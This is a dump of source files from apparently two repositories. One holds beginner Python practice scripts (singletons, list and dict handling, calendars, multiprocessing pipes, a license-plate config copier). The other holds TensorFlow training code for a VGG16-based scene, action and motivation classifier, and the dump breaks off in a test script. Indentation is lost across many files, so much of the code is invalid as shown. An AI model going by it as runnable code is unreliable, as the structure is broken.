def foo(*args, **kwargs):
if cls not in instance:
instance[cls] = cls(*args, **kwargs)
return instance[cls]
return foo
@singleton
class Myclass():
a = 1
obj1 = Myclass()
obj2 = Myclass()
print(obj1 == obj2)
"""
# 元类(type)
# class Singleton(type):
# def __init__(self, *args, **kwargs):
# self._instance = None
# super(Singleton, self).__init__(*args, **kwargs)
#
# def __call__(self, *args, **kwargs):
# if not self._instance:
# self._instance = super(Singleton, self).__call__(*args, **kwargs)
#
# return self._instance
#
#
# class Foo(Singleton):
# a = 1
#
#
# obj1 = Foo()
# obj2 = Foo()
# print(obj1 == obj2)
class Singleton2(type):
def __init__(self, *args, **kwargs):
self.__instance = None
super(Singleton2, self).__init__(*args, **kwargs)
def __call__(self, *args, **kwargs):
if self.__instance is None:
self.__instance = super(Singleton2, self).__call__(*args, **kwargs)
return self.__instance
class Foo(object):
    __metaclass__ = Singleton2  # Python 2 style: the metaclass's __new__/__init__ run once, when the class statement executes, not when Foo is instantiated; Python 3 would use class Foo(metaclass=Singleton2)
foo1 = Foo()
foo2 = Foo()
print(Foo.__dict__)  # '_Singleton__instance': <__main__.Foo object at 0x100c52f10> -- the instance is kept in a name-mangled private attribute, so Foo is not polluted (strictly it still is, it just cannot be reached directly as __instance)
print(foo1 is foo2) # True
```
#### File: practice/qiang06_function/q01_function.py
```python
def foo(a, b, *, d):  # parameters after the bare * are keyword-only
    return a+b+d
# printfoo = foo(1, 2, 4) # error
printfoo = foo(1, 2, d=4)  # arguments after "*" must be passed as keyword arguments
print(printfoo)
import builtins
print(dir(builtins))  # the built-in scope
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
]
# method 1
list_drived = [[x[i] for x in matrix] for i in range(4)]  # transpose the 3x4 matrix (list of lists) into a 4x3 one
print(list_drived)
# method 2
ali = list()
for i in range(4):
    ali.append([row[i] for row in matrix])
print(ali)
# method 3
ali3 = list()
for i in range(4):
ali2 = list()
for x in matrix:
ali2.append(x[i])
ali3.append(ali2)
print(ali2)
print(ali3)
# building dictionaries
print("="*60)
dic = dict([("zhangqiang", 19), ("lishi", 20), ("wangwu", 21)])  # the dict() constructor builds a dictionary straight from a list of tuples
print(dic)
dic2 = dict(zhangsan=18, lisi=19, wangwu=20, zhaoliu=21)  # keyword arguments give the key-value pairs
print(dic2)
# enumerate yields the index together with the value
print("="*60)
for i, x in enumerate(['zhangsan', 'lishi', 'wangwu', 1, 2, 3]):
    print(i, x)
# zip() walks several sequences in parallel
questions = ['name', 'age', 'color']
answer = ['zhangsan', 19, 'blue']
for q, a in zip(questions, answer):
print("what is your {0}, It is {1}".format(q, a))
# reversed() iterates in reverse order
for i in reversed(range(1, 10, 2)):
    print(i, end=" ")
print()
# sorted() returns a sorted copy and leaves the original untouched
basket = ['apple', 'orange', 'apple', 'pear', 'orange', 'banana']
sor = sorted(basket)
print(sor)
# set removes duplicates
for f in sorted(set(basket)):
print(f)
```
#### File: practice/qiang07_mode/q03_fibo.py
```python
def fibo(n):
a, b = 0, 1
while b < n:
print(b, end=" ")
a, b = b, a+b
print()
def fibo2(m):
a, b = 0, 1
fibo_list = list()
while b < m:
fibo_list.append(b)
a, b = b, a+b
print()
return fibo_list
```
#### File: practice/qiang11_instance/q02_calendar.py
```python
import calendar
# year = int(input('请输入年份:'))
# if (year % 4 == 0) and (year % 100 != 0) or (year % 400 == 0):
# print('{}为闰年'.format(year))
# else:
# print('{}不是闰年'.format(year)) #
def calendar_data(year):
if calendar.isleap(year):
print('{}为闰年'.format(year))
else:
print('{}不是闰年'.format(year))
calendar_data(2000)
calendar_data(1999)
```
#### File: practice/qiang11_instance/q04_common_divisor.py
```python
def common_divisor(x, y):
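    # Greatest common divisor by trial division: keep the largest i that divides both numbers.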
if x > y:
minimum = y
else:
minimum = x
for i in range(1, minimum+1):
if (x % i == 0) and (y % i == 0):
common_num = i
return common_num
print('两数的最大公约数为:{}'.format(common_divisor(54, 24)))
# 公约数
# for i in range(1, 55):
# if 54 % i == 0:
# print(i)
def lcm(x, y):
if x > y:
bigger_num = x
else:
bigger_num = y
while True:
if (bigger_num % x == 0) and (bigger_num % y == 0):
            return bigger_num
else:
bigger_num += 1
num = lcm(24, 54)
print('两数的最小公倍数为:{}'.format(num))
```
#### File: practice/qiang11_instance/q06_calendar.py
```python
import calendar
# yy = int(input("请输入年份:"))
# mm = int(input("请输入月份:"))
#
# cale = calendar.month(yy, mm) # 输出日历
# print(cale)
import datetime
cale1 = calendar.month(2019, 6)  # print the calendar for the month
print(cale1)
month_range = calendar.monthrange(2019, 6)  # returns a tuple: weekday of the 1st (0-6) and the number of days in the month
print(month_range)
def getYesterday():
    '''get yesterday's date'''
    today = datetime.date.today()  # today
    oneday = datetime.timedelta(days=1)  # one day
    yesterday = today - oneday
    return yesterday
Today = datetime.date.today()  # today
print(Today)
print(getYesterday())
# method 2: more concise
def getYesterday2():
    yesterday = datetime.date.today() + datetime.timedelta(-1)
    return yesterday
print(datetime.timedelta(-1))  # minus one day
print(getYesterday2())
```
#### File: practice/qiang11_instance/q19_list_clear.py
```python
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(lst)
lst.clear()
print(lst)
# copy
def copylist(lst):
new_lst = lst[:]
return new_lst
li = [1, 2, 3, 4, 5, 6, 7]
print("原列表:", li)
print('现列表:', copylist(li))
# extend() =====================
def li_extend(lst):
li_copy = []
li_copy.extend(lst)
return li_copy
li = [22, 33, 4, 88, 99]
new_li = li_extend(li)
print('原列表:', li)
print('新列表:', new_li)
# list() ======================
def list_copy2(li):
cp_list = list(li)
return cp_list
li = [1, 3, 4, 6, 7, 9]
li2 = list_copy2(li)
print('原列表:', li)
print('新列表:', li2)
```
#### File: practice/qiang12_instance2/q01_str_code.py
```python
def exec_code():
Code = '''
for i in range(101):
print(i, end=' ')
print()
'''
exec(Code)
exec_code()
# string reversal
str = 'Zhangqiang'
print(str[::-1])
print(type(str))
print(reversed(str))
print(''.join(str))
print(''.join(reversed(str)))
# slice the string and swap the two parts
def reverse1(str2, num=2):
Lfirst = str2[0: num]
Lsecond = str2[num: len(str2)]
Rfirst = str2[0:-num]
Rsecond = str2[-num:len(str2)]
print('Rfirst:', Rfirst) # Rfirst: Runo
print('Rsecond:', Rsecond) # Rsecond: ob
print('times1:', Lsecond + Lfirst) # times1: noobRu
print('times2:', Rsecond + Rfirst) # times2: obRuno
if __name__ == "__main__":
str2 = 'Runoob'
reverse1(str2)
# sort a dictionary by key or by value
def sorted_dict():
key_value = dict()
key_value[2] = 56
key_value[1] = 2
key_value[5] = 12
key_value[4] = 24
key_value[8] = 18
key_value[3] = 323
print('按键排序:', key_value)
print(sorted(key_value))
for i in sorted(key_value):
print('sorted:', (i, key_value[i]), end=' ')
print()
print('items_value:', sorted(key_value.items(), key=lambda kv: (kv[1], kv[0])))
sorted_dict()
# sort a list of dictionaries
lis = [{"name": "Taobao", "age": 100},
{"name": "Runoob", "age": 7},
{"name": "Google", "age": 100},
{"name": "Wiki", "age": 200}]
print('sorted_age:', sorted(lis, key=lambda i: i['age']))
print('\r')
print('sorted_age_name:', sorted(lis, key=lambda k: (k['age'], k['name'])))
print('sorted_reverse_by_age:', sorted(lis, key=lambda a: a['age'], reverse=True))
# sum the values of a dictionary
def dict_sum():
dict = {'a': 100, 'b': 200, 'c': 300}
count = 0
for k, v in dict.items():
count += v
print('dict_sum:', count)
dict_sum()
def dict_sum2():
dict = {'a': 100, 'b': 200, 'c': 300}
count = 0
for i in dict:
count += dict[i]
print('dict_sum2:', count)
dict_sum2()
# remove key-value pairs from a dictionary
test_dict = {"Runoob": 1, "Google": 2, "Taobao": 3, "Zhihu": 4}
# del
# del test_dict['Google']
# pop
# pop_value = test_dict.pop('Zhihu')
# print('pop_value:', pop_value)
print(test_dict.pop('ZhangSan', 'None_key'))
print('test_dict:', test_dict)
new_dict = {k: v for k, v in test_dict.items() if k != 'Zhihu'}
print(new_dict)
```
#### File: practice/qiang12_instance2/q04_line_search.py
```python
def search(arr, x, n):
    for i in range(n):
        if arr[i] == x:
            print('exist')
            return i
    # report a miss only after every element has been checked
    return -1
if __name__ == "__main__":
arr = ['A', 'B', 'C', 'D', 'E']
x = 'E'
n = len(arr)
result = search(arr, x, n)
if result != -1:
print('存在,查找的索引为:{}'.format(result))
else:
print('不存在')
```
#### File: practice/qiang13_working/q09_list_select.py
```python
def select_ele(li):
for i in li:
if i == 4 or i == "4":
li.remove(i)
return li
if __name__ == "__main__":
l1 = [1, 2, 3, 4, 5, "4", 6, 7, 8, 9]
print(select_ele(l1))
# 方法二
def select_ele2(li, n=0):
    while n < len(li):  # walk the list step by step so removals are not skipped the way a plain for loop would skip them
for i in li:
if i == 4 or i == '4':
li.remove(i)
n += 1
return li
l1 = [1, 2, 3, 4, 5, "4", 6, 7, 8, 9]
print(select_ele2(l1))
```
#### File: practice/qiang13_working/q13_Pipe.py
```python
from multiprocessing import Pipe, Process
# https://www.jianshu.com/p/a4ac0c478be7
# child-process worker: receive a message from the parent and send a reply
def foo(subconn):
    print('from parent_conn:', subconn.recv())
    subconn.send('吃了的')
if __name__ == "__main__":
    # create both ends of the pipe
    parent_conn, child_conn = Pipe()
    # create the child process
    p = Process(target=foo, args=(child_conn, ))
    # start the child process
    p.start()
    # exchange data between the two processes
    parent_conn.send('吃了么')
    print('from child_conn:', parent_conn.recv())
    # wait for the child process to finish before exiting
    p.join()
```
#### File: practice/qiang13_working/q17_singleton.py
```python
class Singleton2(type):
def __call__(cls, *args, **kwargs):
if not hasattr(cls, '_instance1'):
cls._instance1 = super(Singleton2, cls).__call__(*args, **kwargs)
return cls._instance1
# class B(object): # py2
class B(metaclass=Singleton2): # py3
__metaclass__ = Singleton2
e = B()
f = B()
print(e)
print(f)
print(e is f)
``` |
{
"source": "13528770807/python_script",
"score": 3
} |
#### File: testfield_lpr_data/lpr_data/qiang.py
```python
import shutil
import sys
class Place:
def __init__(self, num):
self.num = num
self.place1 = './license_plate/ZABC255/lp_database.txt'
self.place2 = './license_plate/ZB53Y11/lp_database.txt'
self.place3 = './license_plate/ZC796YR/lp_database.txt'
self.place4 = './license_plate/ZD8789H/lp_database.txt'
self.place5 = './license_plate/HC05EV8/lp_database.txt'
self.placeAll = './license_plate/All/lp_database.txt'
self.destination = '../lpr_config/'
def change(self):
if self.num == '1':
print('禁止通行车辆:浙ABC255')
shutil.copy(self.place1, self.destination)
elif self.num == '2':
print('禁止通行车辆:浙B53Y11')
shutil.copy(self.place2, self.destination)
elif self.num == '3':
print('禁止通行车辆:浙C796YR')
shutil.copy(self.place3, self.destination)
elif self.num == '4':
print('禁止通行车辆:浙D8789H')
shutil.copy(self.place4, self.destination)
elif self.num == '5':
print('禁止通行车辆:沪C05EV8')
shutil.copy(self.place5, self.destination)
else:
print('全部通行')
shutil.copy(self.placeAll, self.destination)
if __name__ == "__main__":
num = sys.argv[1]
p = Place(num)
p.change()
``` |
{
"source": "13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images",
"score": 2
} |
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/baseline_multi.py
```python
import os
import time
import numpy
from six.moves import xrange # pylint: disable=redefined-builtin
from get_data_step2 import input_data
import tensorflow as tf
import model
import math
import vgg16
import numpy as np
flags = tf.app.flags
flags.DEFINE_integer('max_steps',20000, 'Number of steps to run trainer.')
flags.DEFINE_integer('batch_size',16 , 'Batch size.')
FLAGS = flags.FLAGS
MOVING_AVERAGE_DECAY = 0.9999
gpu_num = 1
def placeholder_inputs(batch_size):
#bulit placeholder_inputs
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.IMAGE_SIZE,
model.IMAGE_SIZE,
model.CHANNELS))
sc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
ac_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
mc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
keep_pro = tf.placeholder(tf.float32)
return images_placeholder,sc_labels_placeholder,ac_labels_placeholder,mc_labels_placeholder,keep_pro
def average_gradients(tower_grads):
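    # Average the gradients across GPU towers: for every variable, stack the per-tower gradients and take their mean.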
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def tower_loss(name_scope, logit, sc_labels,ac_labels,mc_labels):
sc_labels = tf.one_hot(sc_labels,100,on_value=1,off_value=None,axis=1)
ac_labels = tf.one_hot(ac_labels,100,on_value=1,off_value=None,axis=1)
mc_labels = tf.one_hot(mc_labels,256,on_value=1,off_value=None,axis=1)
labels = tf.concat([sc_labels,ac_labels,mc_labels],1)
cross_entropy_mean = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=labels,logits=logit)
)
tf.summary.scalar(
name_scope + '_cross_entropy',
cross_entropy_mean
)
weight_decay_loss = tf.get_collection('weightdecay_losses')
tf.summary.scalar(name_scope + '_weight_decay_loss', tf.reduce_mean(weight_decay_loss) )
# Calculate the total loss for the current tower.
total_loss = cross_entropy_mean
tf.summary.scalar(name_scope + '_total_loss', tf.reduce_mean(total_loss) )
return total_loss
def tower_acc(logit, labels):
correct_pred = tf.equal(tf.argmax(logit, 1), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return accuracy
def topk_acc(logit, labels , k):
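    # Fraction of the batch whose true label falls inside the top-k predictions; the divisor 16 matches the batch size of 16.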
list=tf.nn.in_top_k(logit,labels,k)
in_top1 = tf.to_float(list)
num_correct = tf.reduce_sum(in_top1)
return num_correct/ 16
def _variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
var = tf.get_variable(name, shape, initializer=initializer)
return var
def _variable_with_weight_decay(name, shape, wd):
var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer())
if wd is not None:
weight_decay = tf.nn.l2_loss(var)*wd
tf.add_to_collection('weightdecay_losses', weight_decay)
return var
def run_training():
    # Get the sets of images and labels for training and validation.
# Tell TensorFlow that the model will be built into the default Graph.
# Create model directory
print ('loading and init vgg16.........')
vgg=vgg16.Vgg16()
with tf.Graph().as_default():
global_step = tf.get_variable(
'global_step',
[],
initializer=tf.constant_initializer(0),
trainable=False
)
images_placeholder,sc_labels_placeholder,ac_labels_placeholder,mc_labels_placeholder,keep_pro = placeholder_inputs(
FLAGS.batch_size * gpu_num
)
tower_grads1 = []
tower_grads2 = []
tower_grads3 = []
multi_logits = []
learning_rate=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.99,staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
opt_multi = tf.train.AdamOptimizer(learning_rate)
with tf.variable_scope('var_name') as var_scope:
multi_fea_weights = {
'w1': _variable_with_weight_decay('multi_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('multi_feawout', [2048, 456], 0.005)
}
multi_fea_biases = {
'b1': _variable_with_weight_decay('multi_b1', [2048], 0.000),
'out': _variable_with_weight_decay('multi_feabout', [456], 0.000),
}
sc_fea_weights = {
'w1': _variable_with_weight_decay('sc_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('sc_feawout', [2048, 100], 0.005)
}
sc_fea_biases = {
'b1': _variable_with_weight_decay('sc_b1', [2048], 0.000),
'out': _variable_with_weight_decay('sc_feabout', [100], 0.000),
}
ac_fea_weights = {
'w1': _variable_with_weight_decay('ac_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('ac_feawout', [2048, 100], 0.005)
}
ac_fea_biases = {
'b1': _variable_with_weight_decay('ac_b1', [2048], 0.000),
'out': _variable_with_weight_decay('ac_feabout', [100], 0.000),
}
mc_fea_weights = {
'w1': _variable_with_weight_decay('mc_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('mc_feawout', [2048, 256], 0.005)
}
mc_fea_biases = {
'b1': _variable_with_weight_decay('mc_b1', [2048], 0.000),
'out': _variable_with_weight_decay('mc_feabout', [256], 0.000),
}
for gpu_index in range(0, gpu_num):
with tf.device('/gpu:%d' % gpu_index):
varlist1 = [ multi_fea_weights.values(),multi_fea_biases.values() ]
vgg.build(images_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:,:,:])
train_features=vgg.fc7
multi_logit = model.get_predict(
train_features,
keep_pro,
FLAGS.batch_size,
multi_fea_weights,
multi_fea_biases
)
loss_name_scope = ('gpud_%d_loss' % gpu_index)
multi_loss = tower_loss(
'multi',
multi_logit,
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
mc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size]
)
grads1 = opt_multi.compute_gradients(multi_loss, varlist1)
tower_grads1.append(grads1)
multi_logits.append(multi_logit)
multi_logits = tf.concat(multi_logits,0)
sc_logits = tf.slice(multi_logits,[0,0],[16,100])
sc_accuracy = topk_acc(sc_logits, sc_labels_placeholder ,5)
#sc_accuracy = tower_acc(sc_logits, sc_labels_placeholder)
tf.summary.scalar('sc_accuracy', sc_accuracy)
ac_logits = tf.slice(multi_logits,[0,100],[16,100])
ac_accuracy = topk_acc(ac_logits, ac_labels_placeholder ,5)
#ac_accuracy = tower_acc(ac_logits, ac_labels_placeholder)
tf.summary.scalar('ac_accuracy', ac_accuracy)
mc_logits = tf.slice(multi_logits,[0,200],[16,256])
mc_accuracy = topk_acc(mc_logits, mc_labels_placeholder ,5)
#mc_accuracy = tower_acc(mc_logits, mc_labels_placeholder)
tf.summary.scalar('mc_accuracy', mc_accuracy)
grads1 = average_gradients(tower_grads1)
apply_gradient_multi = opt_multi.apply_gradients(grads1, global_step=global_step)
train_multi = tf.group(apply_gradient_multi)
null_op = tf.no_op()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver(multi_fea_weights.values() + multi_fea_biases.values())
init = tf.global_variables_initializer()
# Create a session for running Ops on the Graph.
sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True)
)
sess.run(init)
# Create summary writter
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter('./visual_logs/baseline_multi_visual_logs/train', sess.graph)
test_writer = tf.summary.FileWriter('./visual_logs/baseline_multi_visual_logs/test', sess.graph)
for step in xrange(FLAGS.max_steps+1):
start_time = time.time()
train_actions,train_images,train_ac_labels,train_sc_labels,train_mc_labels, _, _= input_data(
filename='./list/train.list',
batch_size=FLAGS.batch_size * gpu_num,
start_pos=-1,
shuffle=True
)
sess.run(train_multi, feed_dict={
images_placeholder: train_images,
sc_labels_placeholder: train_sc_labels,
ac_labels_placeholder: train_ac_labels,
mc_labels_placeholder: train_mc_labels,
keep_pro : 0.5
})
duration = time.time() - start_time
print('Batchnum %d: %.3f sec' % (step, duration))
if (step) %50 == 0 or (step + 1) == FLAGS.max_steps:
print('Step %d/%d: %.3f sec' % (step,FLAGS.max_steps, duration))
print('Training Data Eval:')
summary,sc_acc,ac_acc,mc_acc,multi_loss_value= sess.run(
[merged,sc_accuracy,ac_accuracy,mc_accuracy,multi_loss],
feed_dict={ images_placeholder: train_images,
ac_labels_placeholder: train_ac_labels,
sc_labels_placeholder: train_sc_labels,
mc_labels_placeholder: train_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
                print('multi_loss= %.2f' % np.mean(multi_loss_value))
train_writer.add_summary(summary, step)
if (step) %100 == 0 or (step + 1) == FLAGS.max_steps:
print('Validation Data Eval:')
val_actions,val_images,val_ac_labels,val_sc_labels,val_mc_labels, _, _= input_data(
filename='./list/test.list',
start_pos=-1,
batch_size=FLAGS.batch_size * gpu_num,
shuffle=True)
summary,sc_acc,ac_acc,mc_acc,multi_loss_value = sess.run(
[merged,sc_accuracy,ac_accuracy,mc_accuracy,multi_loss],
feed_dict={
images_placeholder: val_images,
ac_labels_placeholder: val_ac_labels,
sc_labels_placeholder: val_sc_labels,
mc_labels_placeholder: val_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
                print('multi_loss= %.2f' % np.mean(multi_loss_value))
test_writer.add_summary(summary, step)
# Save the model checkpoint periodically.
if step > 1 and step % 2000 == 0:
checkpoint_path = os.path.join('./models/baseline_multi_models', 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=global_step)
print("done")
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run()
```
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/model.py
```python
import tensorflow as tf
import vgg16
SCNUM_CLASSES =100
ACNUM_CLASSES =100
MCNUM_CLASSES =256
INPUT_SIZE =4800
IMAGE_SIZE =224
FEATURE_SIZE = 4096
CHANNELS = 3
def batchnorm(Ylogits, is_test, iteration, offset, convolutional=False):
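    # Batch normalization that keeps exponential moving averages of the batch mean/variance;
    # when is_test is True the moving averages are used instead of the current batch statistics.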
exp_moving_avg = tf.train.ExponentialMovingAverage(0.999, iteration) # adding the iteration prevents from averaging across non-existing iterations
bnepsilon = 1e-5
if convolutional:
mean, variance = tf.nn.moments(Ylogits, [0, 1, 2])
else:
mean, variance = tf.nn.moments(Ylogits, [0])
update_moving_averages = exp_moving_avg.apply([mean, variance])
m = tf.cond(is_test, lambda: exp_moving_avg.average(mean), lambda: mean)
v = tf.cond(is_test, lambda: exp_moving_avg.average(variance), lambda: variance)
Ybn = tf.nn.batch_normalization(Ylogits, m, v, offset, None, bnepsilon)
return Ybn, update_moving_averages
def get_feature(_F, _dropout, batch_size, _weights, _biases):
# Output: class prediction
feature = tf.matmul(_F, _weights['w1']) + _biases['b1']
feature = tf.nn.relu(feature, name='fc1')
feature = tf.nn.dropout(feature, _dropout)
feature = tf.matmul(feature, _weights['out']) + _biases['out'] #NUM_CLASSES
feature = tf.nn.relu(feature, name='fc2') # Relu activation
feature = tf.nn.dropout(feature, _dropout)
return feature
def get_predict(_F, _dropout, batch_size, _weights, _biases):
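    # Two fully connected layers on top of the extracted features; returns raw logits (no activation on the output layer).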
feature = tf.matmul(_F, _weights['w1']) + _biases['b1']
feature = tf.nn.relu(feature, name='fc1')
feature = tf.nn.dropout(feature, _dropout)
feature = tf.matmul(feature, _weights['out']) + _biases['out'] #NUM_CLASSES
return feature
def sc_model(_X, _dropout, batch_size, _weights, _biases):
#get Us
sc = tf.matmul(_X, _weights['w1']) + _biases['b1']
sc = tf.nn.relu(sc, name='fc1')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['w2']) + _biases['b2']
sc = tf.nn.relu(sc, name='fc2')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['out']) + _biases['out'] #NUM_CLASSES
# sigmoid (Us)
sc = tf.nn.sigmoid(sc, name='sigmoid') # sigmoid
return sc
def ac_model(_Z, sc , _dropout, batch_size, _weights, _biases):
#get Ua
ac = tf.matmul(_Z, _weights['w1']) + _biases['b1']
ac = tf.nn.relu(ac, name='fc1')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['w2']) + _biases['b2']
ac = tf.nn.relu(ac, name='fc2')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['out']) + _biases['out'] #NUM_CLASSES
ac = tf.nn.relu(ac, name='out') # Relu activation
# W_Ua * Ua
ac = tf.transpose(ac, perm=[1,0])
ac = tf.matmul(_weights['W_Ua'], ac)
ac = tf.transpose(ac, perm=[1,0])
# W_alpha * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
sc = tf.transpose(sc, perm=[1,0])
sc = tf.matmul(_weights['W_alpha'], sc)
sc = tf.transpose(sc, perm=[1,0])
# sigmoid (W_alpha * Ys + W_Ua * Ua)
ac = tf.add_n([ac, sc])
ac = tf.nn.sigmoid(ac, name='sigmoid') # sigmoid
return ac
def mc_model(_Y, sc , ac, _dropout, batch_size, _weights, _biases ):
#get Ua
mc = tf.matmul(_Y, _weights['w1']) + _biases['b1']
mc = tf.nn.relu(mc, name='fc1')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['w2']) + _biases['b2']
mc = tf.nn.relu(mc, name='fc2')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['out']) + _biases['out'] #NUM_CLASSES
mc = tf.nn.relu(mc, name='out') # Relu activation
# W_Um * Um
mc = tf.transpose(mc, perm=[1,0])
mc = tf.matmul(_weights['W_Um'], mc)
mc = tf.transpose(mc, perm=[1,0])
# W_beta * Ya + W_gama * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
ac = tf.one_hot(ac,100,on_value=1,off_value=None,axis=1)
ac = tf.cast(ac, tf.float32)
ac = tf.transpose(ac, perm=[1,0])
sc = tf.transpose(sc, perm=[1,0])
ac_sc = tf.add_n([tf.matmul(_weights['W_beta'], ac),tf.matmul(_weights['W_gama'], sc)])
ac_sc = tf.transpose(ac_sc, perm=[1,0])
# sigmoid (W_beta * Ya + W_gama * Ys + W_Um * Um)
mc = tf.add_n([mc,ac_sc])
mc = tf.nn.sigmoid(mc, name='sigmoid') # sigmoid
return mc
def sc_model2(_X, _dropout, batch_size, _weights, _biases ,globle_step):
#get Us
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
sc = tf.matmul(_X, _weights['w2'])
sc, update_ema1 = batchnorm(sc, tst, globle_step, _biases['b2'])
sc = tf.nn.relu(sc, name='fc2')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['out']) + _biases['out'] #NUM_CLASSES
# sigmoid (Us)
sc = tf.nn.sigmoid(sc, name='sigmoid') # sigmoid
return sc,update_ema1
def ac_model2(_Z, sc , _dropout, batch_size, _weights, _biases ,globle_step):
#get Ua
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
ac = tf.matmul(_Z, _weights['w2'])
ac, update_ema1 = batchnorm(ac, tst, globle_step, _biases['b2'])
ac = tf.nn.relu(ac, name='fc2')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['out'])#NUM_CLASSES
ac, update_ema2 = batchnorm(ac, tst, globle_step, _biases['out'])
ac = tf.nn.relu(ac, name='out') # Relu activation
# W_Ua * Ua
ac = tf.transpose(ac, perm=[1,0])
ac = tf.matmul(_weights['W_Ua'], ac)
ac = tf.transpose(ac, perm=[1,0])
# W_alpha * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
sc = tf.transpose(sc, perm=[1,0])
sc = tf.matmul(_weights['W_alpha'], sc)
sc = tf.transpose(sc, perm=[1,0])
# sigmoid (W_alpha * Ys + W_Ua * Ua)
ac = tf.add_n([ac, sc])
ac = tf.nn.sigmoid(ac, name='sigmoid') # sigmoid
return ac,update_ema1,update_ema2
def mc_model2(_Y, sc , ac, _dropout, batch_size, _weights, _biases ,globle_step):
#get Ua
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
mc = tf.matmul(_Y, _weights['w2'])
mc, update_ema1 = batchnorm(mc, tst, globle_step, _biases['b2'])
mc = tf.nn.relu(mc, name='fc2')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['out']) #NUM_CLASSES
mc, update_ema2 = batchnorm(mc, tst, globle_step, _biases['out'])
mc = tf.nn.relu(mc, name='out') # Relu activation
# W_Um * Um
mc = tf.transpose(mc, perm=[1,0])
mc = tf.matmul(_weights['W_Um'], mc)
mc = tf.transpose(mc, perm=[1,0])
# W_beta * Ya + W_gama * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
if ac.shape==[batch_size]:
ac = tf.one_hot(ac,100,on_value=1,off_value=None,axis=1)
ac = tf.cast(ac, tf.float32)
ac = tf.transpose(ac, perm=[1,0])
sc = tf.transpose(sc, perm=[1,0])
ac_sc = tf.add_n([tf.matmul(_weights['W_beta'], ac),tf.matmul(_weights['W_gama'], sc)])
ac_sc = tf.transpose(ac_sc, perm=[1,0])
# sigmoid (W_beta * Ya + W_gama * Ys + W_Um * Um)
mc = tf.add_n([mc,ac_sc])
mc = tf.nn.sigmoid(mc, name='sigmoid') # sigmoid
return mc,update_ema1,update_ema2
```
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/test_step1.py
```python
import os
import time
import numpy
from six.moves import xrange # pylint: disable=redefined-builtin
from get_data_step1 import input_data
import tensorflow as tf
import model
import math
import numpy as np
flags = tf.app.flags
flags.DEFINE_integer('max_steps',421, 'Number of steps to run trainer.')
flags.DEFINE_integer('batch_size',6 , 'Batch size.')
FLAGS = flags.FLAGS
MOVING_AVERAGE_DECAY = 0.9999
pre_model_save_dir = './models/step1_models'
